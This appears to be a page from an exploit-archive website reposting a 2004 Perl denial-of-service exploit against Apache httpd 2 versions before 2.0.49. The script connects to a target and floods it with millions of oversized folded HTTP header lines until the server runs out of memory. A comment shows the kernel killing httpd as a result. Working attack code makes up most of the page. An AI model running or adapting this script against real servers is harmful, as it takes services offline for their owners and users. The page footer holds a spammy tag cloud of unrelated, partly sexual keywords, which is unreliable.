about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Apache httpd Arbitrary Long HTTP Headers DoS Exploit



2004-07-22 Apache httpd Arbitrary Long HTTP Headers DoS Exploit
#/usr/bin/perl
#
#exploit for apache ap_get_mime_headers_core() vuln
#
#adv is here: www.guninski.com httpd1.html
#
#version: apache 2 <2.0.49 apache 1 not tested.
#
#by bkbll bkbll#cnhonker.net www cnhonker com
#
#tail -f /var/log/messages
#Jul 1 17:43:16 www kernel: Out of Memory: Killed process 658 (httpd) 
#

use IO::Socket::INET;

$host="10.10.10.114";
$port=80;
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort =>
$port, Proto => 'tcp') || 
die "new error$@\n";
binmode($sock);
$hostname="Host: $host";
$buf2='A'x50;
$buf4='A'x8183;
$len=length($buf2);
$buf="GET / HTTP/1.1\r\n";
send($sock,$buf,0) || die "send error:$@\n";
for($i= 0; $i < 2000000; $i++)
{
    $buf=" $buf4\r\n";
    send($sock,$buf,0) || die "send error:$@, target maybe have been
D.o.S?\n";
}
$buf="$hostname\r\n";
$buf.="Content-Length: $len\r\n";

$buf.="\r\n";
$buf.=$buf2."\r\n\r\n";

send($sock,$buf,0) || die "send error:$@\n";
print "Ok, our buffer have send to target \n";
close($sock);
securitydot.net - 2004-07-22

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 07:23:24 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
3GPSEXCLIP FreeBSD 4 n...html/p http://www FELTER free keylo Trishabatr ipb 1.3.1 Freehotgir news for C vumansex a...25257B news for c www.cha100 www.03731. Freesexyph Blue Coat www.jockey t635t sex fotos www.toushi adodb_lite www.iptry. indian tee Anemasex news for C www.iptry. bbs.skszx. www.silkro sexy lesbi Girls havi client exe sex viedio Freesexywa www.skszx. sexmomo Open pictu single aft www.avizon www.hbxfds 2wire imgsrc+ru Azrael\\\' www.skszx. Fuckingpus ww.xnxx.co sex viedio www.51dna bbs.cx5566 www.sex.co